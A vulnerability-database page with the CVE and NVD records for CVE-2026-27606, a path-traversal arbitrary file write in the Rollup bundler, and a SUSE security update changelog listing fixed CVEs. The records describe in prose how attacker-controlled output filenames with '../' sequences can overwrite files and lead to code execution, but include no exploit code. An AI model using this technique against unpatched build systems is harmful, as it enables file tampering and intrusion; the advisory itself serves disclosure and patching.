CVE-2026-27606 (GCVE-0-2026-27606)
Vulnerability from cvelistv5 – Published: 2026-02-25 02:08 – Updated: 2026-02-25 20:10
VLAI?
Title
Rollup 4 has Arbitrary File Write via Path Traversal
Summary
Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.
Severity ?
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-27606",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-02-25T20:09:59.552224Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-25T20:10:29.816Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "rollup",
"vendor": "rollup",
"versions": [
{
"status": "affected",
"version": "\u003c 2.80.0"
},
{
"status": "affected",
"version": "\u003e= 3.0.0, \u003c 3.30.0"
},
{
"status": "affected",
"version": "\u003e= 4.0.0, \u003c 4.59.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-25T02:08:06.682Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
},
{
"name": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"name": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"name": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"name": "https://github.com/rollup/rollup/releases/tag/v2.80.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"name": "https://github.com/rollup/rollup/releases/tag/v3.30.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"name": "https://github.com/rollup/rollup/releases/tag/v4.59.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
}
],
"source": {
"advisory": "GHSA-mw96-cpmx-2vgc",
"discovery": "UNKNOWN"
},
"title": "Rollup 4 has Arbitrary File Write via Path Traversal"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-27606",
"datePublished": "2026-02-25T02:08:06.682Z",
"dateReserved": "2026-02-20T19:43:14.602Z",
"dateUpdated": "2026-02-25T20:10:29.816Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-27606\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-25T03:16:04.603\",\"lastModified\":\"2026-02-25T16:05:11.063\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rollupjs:rollup:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"2.80.0\",\"matchCriteriaId\":\"3B082000-6A3D-4F24-87C3-CE2B4D66BE3E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rollupjs:rollup:*:*:*:*:*:node.js:*:*\",\"versionStartIncluding\":\"3.0.0\",\"versionEndExcluding\":\"3.30.0\",\"matchCriteriaId\":\"26A20C56-5C17-468B-A026-2299D1BE909D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rollupjs:rollup:*:*:*:*:*:node.js:*:*\",\"versionStartIncluding\":\"4.0.0\",\"versionEndExcluding\":\"4.59.0\",\"matchCriteriaId\":\"5BC2165D-030E-46E5-BA3D-DABB9B58E6FC\"}]}]}],\"references\":[{\"url\":\"https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/rollup/rollup/releases/tag/v2.80.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/rollup/rollup/releases/tag/v3.30.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/rollup/rollup/releases/tag/v4.59.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-27606\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-25T20:09:59.552224Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-25T20:10:18.661Z\"}}], \"cna\": {\"title\": \"Rollup 4 has Arbitrary File Write via Path Traversal\", \"source\": {\"advisory\": \"GHSA-mw96-cpmx-2vgc\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"rollup\", \"product\": \"rollup\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.80.0\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.0.0, \u003c 3.30.0\"}, {\"status\": \"affected\", \"version\": \"\u003e= 4.0.0, \u003c 4.59.0\"}]}], \"references\": [{\"url\": \"https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc\", \"name\": \"https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2\", \"name\": \"https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e\", \"name\": \"https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3\", \"name\": \"https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/rollup/rollup/releases/tag/v2.80.0\", \"name\": \"https://github.com/rollup/rollup/releases/tag/v2.80.0\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/rollup/rollup/releases/tag/v3.30.0\", \"name\": \"https://github.com/rollup/rollup/releases/tag/v3.30.0\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/rollup/rollup/releases/tag/v4.59.0\", \"name\": \"https://github.com/rollup/rollup/releases/tag/v4.59.0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-25T02:08:06.682Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-27606\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-25T20:10:29.816Z\", \"dateReserved\": \"2026-02-20T19:43:14.602Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-25T02:08:06.682Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-27606
Vulnerability from fkie_nvd - Published: 2026-02-25 03:16 - Updated: 2026-02-25 16:05
Severity ?
Summary
Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rollupjs:rollup:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "3B082000-6A3D-4F24-87C3-CE2B4D66BE3E",
"versionEndExcluding": "2.80.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:rollupjs:rollup:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "26A20C56-5C17-468B-A026-2299D1BE909D",
"versionEndExcluding": "3.30.0",
"versionStartIncluding": "3.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:rollupjs:rollup:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "5BC2165D-030E-46E5-BA3D-DABB9B58E6FC",
"versionEndExcluding": "4.59.0",
"versionStartIncluding": "4.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue."
},
{
"lang": "es",
"value": "Rollup es un empaquetador de m\u00f3dulos para JavaScript. Las versiones anteriores a la 2.80.0, 3.30.0 y 4.59.0 del empaquetador de m\u00f3dulos Rollup (espec\u00edficamente v4.x y presente en el c\u00f3digo fuente actual) es vulnerable a una escritura de archivo arbitraria mediante salto de ruta. La sanitizaci\u00f3n insegura de nombres de archivo en el motor principal permite a un atacante controlar los nombres de archivo de salida (por ejemplo, mediante entradas con nombre de CLI, alias de fragmentos manuales o plugins maliciosos) y usar secuencias de salto (\u0027../\u0027) para sobrescribir archivos en cualquier lugar del sistema de archivos del host para el que el proceso de compilaci\u00f3n tenga permisos. Esto puede conducir a una ejecuci\u00f3n remota de c\u00f3digo (RCE) persistente al sobrescribir archivos de configuraci\u00f3n cr\u00edticos del sistema o del usuario. Las versiones 2.80.0, 3.30.0 y 4.59.0 contienen un parche para el problema."
}
],
"id": "CVE-2026-27606",
"lastModified": "2026-02-25T16:05:11.063",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "PROOF_OF_CONCEPT",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-02-25T03:16:04.603",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
SUSE-SU-2026:1013-1
Vulnerability from csaf_suse - Published: 2026-03-25 10:11 - Updated: 2026-03-25 10:11Summary
Security update 5.0.7 for Multi-Linux Manager Client Tools
Severity
Important
Notes
Title of the patch: Security update 5.0.7 for Multi-Linux Manager Client Tools
Description of the patch: This update fixes the following issues:
dracut-saltboot:
- Version update to 1.1.0:
* Retry DHCP requests up to 3 times (bsc#1253004)
golang-github-QubitProducts-exporter_exporter:
- Non-customer-facing optimization and update
golang-github-boynux-squid_exporter:
- Version update from 1.6.0 to 1.13.0 with the following highlighted changes and fixes (jsc#PED-14971):
* Added compatibility for Squid 6 and support for the squid-internal-mgr metrics path
* Added TLS and Basic Authentication to the exporter’s web interface
* Added support for the exporter to authenticate against the Squid proxy itself
* Allow the gathering of process information without requiring root privileges
* The exporter can now be configured using environment variables
* Added support for custom labels to all exported metrics for better data filtering
* New metrics to track if Squid is running (squid_up), how long a scrape takes, and if any errors occurred
* Added 'service time' metrics to analyze proxy speed and performance.
* Added a metric for open file descriptors (process_open_fds) to help prevent connection bottlenecks
* Corrected the squid_client_http_requests_total metric to ensure accurate reporting
golang-github-lusitaniae-apache_exporter:
- Version update from 1.0.8 to 1.0.10:
* Updated github.com/prometheus/client_golang to 1.21.1
* Updated github.com/prometheus/common to 0.63.0
* Updated github.com/prometheus/exporter-toolkit to 0.14.0
* Fixed signal handler logging
golang-github-prometheus-prometheus:
- Security issues fixed:
* CVE-2026-27606: Fixed arbitrary file write via path traversal in rollup (bsc#1258893)
* CVE-2026-25547: Fixed unbounded brace range expansion leading to excessive CPU and memory consumption (bsc#1257841)
* CVE-2026-1615, CVE-2025-61140 The old web UI is no longer built due to security issues (bsc#1257897, bsc#1257442)
* CVE-2025-13465: Bump lodash package to version 4.17.23 to fix prototype pollution vulnerability (bsc#1257329)
* CVE-2025-12816: Interpretation conflict vulnerability allowing bypassing cryptographic verifications (bsc#1255588)
- Version update from 2.53.4 to 3.5.0 with the following highlighted changes (jsc#PED-13824):
* Modernized Interface: Introduced a brand-new UI
* Enhanced Cloud and Auth: Added unified AWS service discovery (EC2, ECS, Lightsail) and Azure Workload Identity support
for more secure, native cloudauthentication.
* Performance Standards: Fully integrated OpenTelemetry (OTLP) ingestion and moved Native Histograms from experimental
to a stable feature.
* Advanced Data Export: Rolled out Remote Write 2.0, offering better performance and metadata handling when sending
data to external systems.
* Query Power: Added new PromQL functions (like first_over_time and last_over_time) and optimization for grouping
operations
* Better Visibility: The UI now displays detailed relabeling steps, scrape intervals, and timeouts, making it easier
to troubleshoot why targets aren't reporting correctly.
* Critical Fixes: Resolved significant memory leaks related to query logging and fixed bugs where targets were
accidentally being scraped multiple times
grafana:
- Security issues fixed:
* CVE-2026-21722: Public dashboards annotations: use dashboard timerange if time selection disabled (bsc#1258136)
* CVE-2026-21721: Fixed access control by the dashboard permissions API (bsc#1257337)
* CVE-2026-21720: Fixed unauthenticated DoS (bsc#1257349)
* CVE-2025-68156: Fixed potential DoS via unbounded recursion in builtin functions (bsc#1255340)
* CVE-2025-3415: Fixedexposure of DingDing alerting integration URL to Viewer level users (bsc#1245302)
- Version update from 11.5.10 to 11.6.11 with the following highlighted changes and fixes:
* Performance Boost: Introduced WebGL-powered geomaps for smoother map visualizations and
removed blurred backgrounds from UI overlays to speed up the interface
* One-Click Actions: Visualizations now support faster navigation via one-click links and actions
* Alerting History: Added version history for alert rules, allowing you to track changes over time
* Service Accounts: Automated the migration of old API keys to more secure Service Accounts upon startup
* Cron Support: Annotations now support Cron syntax for more flexible scheduling
* Identity and Auth: Hardened the Avatar feature (now requires sign-in) and fixed several login redirection issues
when Grafana is hosted on a subpath
* Data Source Support: Added support for Cloud Partner Prometheus data sources and improved Azure legend formatting
* Alerting Limits: Added size limits for expanded notification templates to prevent system strain
* RBAC: Integrated Role-Based Access Control (RBAC) into the Alertmanager via the reqAction field
* Data Consistency: Fixed several issues with Graphite and InfluxDB regarding how variables are handled in repeated
rows or nested queries
* Dashboard Reliability: Resolved bugs involving row repeats and 'self-referencing' data links
* Alerting Fixes: Patched a critical 'panic' (crash) caused by a race condition in alert rules and fixed issues where
contact points weren't working correctly
* URL Handling: Fixed a bug where 'true' values in URL parameters weren't being read correctly
prometheus-blackbox_exporter:
- Non-customer-facing optimization and update
spacecmd:
- Version update to 5.0.15:
* Fixed typo in spacecmd help ca-cert flag (bsc#1253174)
* Convert cached IDs to integer values (bsc#1251995)
* Fixed spacecmd binary file upload (bsc#1253659)
uyuni-tools:
- Version update to 0.1.38:
* Fixed cobbler configuration when migrating to standalone files (bsc#1256803)
* Detect custom apache and squid config in the /etc/uyuni/proxy folder
* Add ssh tuning to configure sshd (bsc#1253738)
* Ignore supportconfig errors (bsc#1255781)
* Bumped the default image tag to 5.0.7
* Removed cgroup mount for podman containers (bsc#1253347)
* Registry flag can be a string (bsc#1254589)
* Use static supportconfig name to avoid dynamic search (bsc#1257941)
Patchnames: SUSE-2026-1013,SUSE-SLE-Manager-Tools-15-2026-1013,SUSE-SLE-Manager-Tools-For-Micro-5-2026-1013,SUSE-SLE-Module-Packagehub-Subpackages-15-SP7-2026-1013,openSUSE-SLE-15.6-2026-1013
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
8.6 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
8.2 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
8.1 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
9.8 (Critical)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
8.1 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
